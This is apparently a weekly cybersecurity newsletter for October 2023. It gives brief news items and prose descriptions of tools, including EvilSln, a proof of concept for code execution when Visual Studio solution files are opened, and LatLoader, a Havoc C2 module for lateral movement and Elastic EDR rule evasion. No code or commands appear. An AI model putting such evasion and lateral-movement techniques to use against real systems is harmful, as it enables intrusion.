Week 41, October 9-15, 2023
Week 41, October 9-15, 2023. Cybersecurity Weekly Updates.
This week in the world of cybersecurity:
A Massive Ad Fraud Botnet powered by hacked Android and iOS devices has emerged as a significant threat, raising concerns about online security.
Cybercriminals are targeting senior executives in U.S. firms using the EvilProxy Phishing Kit, highlighting the need for heightened vigilance in the corporate world.
Meanwhile, the discovery of High-Severity Flaws in ConnectedIO’s 3G/4G routers has sparked worries regarding the security of Internet of Things (IoT) devices.
А Security Patch addressing two new flaws in the Curl Library is set to arrive on October 11, emphasizing the importance of prompt updates.
Google is adopting passkeys as the default sign-in method for all users, a step forward in enhancing account security.
Recent Tools and Techniques
These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.
FHC, short for Fast HTTP Checker, is a versatile tool coded in Rust that functions smoothly on various platforms like Linux, Windows, macOS, Android, Aarch64, ARM, and more. Its primary aim is to provide the community with a highly efficient HTTP checker. FHC employs a clever approach by attempting to connect via HTTPS first and seamlessly switching to HTTP if necessary, ensuring that no active HTTP host goes unnoticed. When it comes to performance and speed, FHC is remarkably resource-efficient, capable of handling up to 1000 threads on a single-core machine without a hitch; the limiting factor is your network speed. In optimal network conditions (as verified on a Google Cloud machine), FHC can perform HTTP checks for approximately 913 hosts per second by default. The actual number of hosts resolved may vary depending on factors such as the presence of only HTTP (not HTTPS) hosts and their availability, which may require double-checking. In a real-world demonstration, FHC efficiently resolved subdomains of google.com, showcasing its practicality and effectiveness.
The Package Analysis project is a vital tool that evaluates the capabilities of packages found in open source repositories. Its primary purpose is to identify potential malicious software by examining specific behaviors, such as the files they access, the addresses they connect to, and the commands they execute. Additionally, the project monitors changes in package behavior over time, alerting users when previously safe software exhibits suspicious actions. This initiative aims to enhance the security of open source software by detecting and highlighting malicious behavior, aiding consumers in their package selection, and providing valuable data for researchers studying the ecosystem. The project seamlessly integrates with the Package Feeds project and comprises key components: a scheduler, analysis modules (including one-shot analysis and worker components), and a loader to manage and store analysis results in BigQuery. The goal is to offer a collaborative, community-driven infrastructure for scrutinizing open source package behavior, with the added flexibility for standalone use in providing package feeds or runtime behavior data. The project ensures package isolation through gVisor containers, allowing for comprehensive analysis, including strace and packet data, to uncover potential threats and vulnerabilities.
EvilSln is a tool designed to highlight a new exploitation technique for Visual Studio projects, shedding light on the security risks associated with opening .sln files. The background for this tool stems from incidents like the Lazarus APT group’s use of malicious event commands within Visual Studio project files to execute harmful code during compilation, as observed in early 2021. This incident underscores the importance of considering security when working with Visual Studio and similar tools like JetBrains’ IDEs and VSCode, as they share vulnerabilities when handling unsafe projects. While some products have introduced protective mechanisms, EvilSln serves as a proof of concept to increase awareness of potential risks and empower users to safeguard themselves against potential hacks.
LatLoader is a Proof of Concept (PoC) module designed to showcase automated lateral movement using the Havoc C2 framework. Its primary aim is to facilitate the learning of BOF (Beacon Object Files) and Havoc module development for others. Additionally, this project serves as a valuable resource for gaining insights into basic EDR (Endpoint Detection and Response) rule evasions, especially in the context of lateral movement. The sideload subcommand within LatLoader represents a comprehensive PoC of this module, attempting to execute lateral movement through DLL sideloading techniques while bypassing default Elastic EDR rules. For detailed information on the specific Elastic EDR rules circumvented by this module and the methods employed, refer to the section titled “Elastic EDR Rule Evasions” below.
That’s a wrap on this week’s edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defense. Hopefully, the insights and information shared today will assist in navigating this complex domain and in strengthening defenses against potential threats. Stay vigilant, stay informed, and look forward to more insights into the world of cyber-security in next week’s edition.
To stay in sync with the weekly cyber-security roundups, remember to subscribe to the newsletter and follow on social media platforms. If there are any questions or specific topics you’d like to see covered, don’t hesitate to get in touch.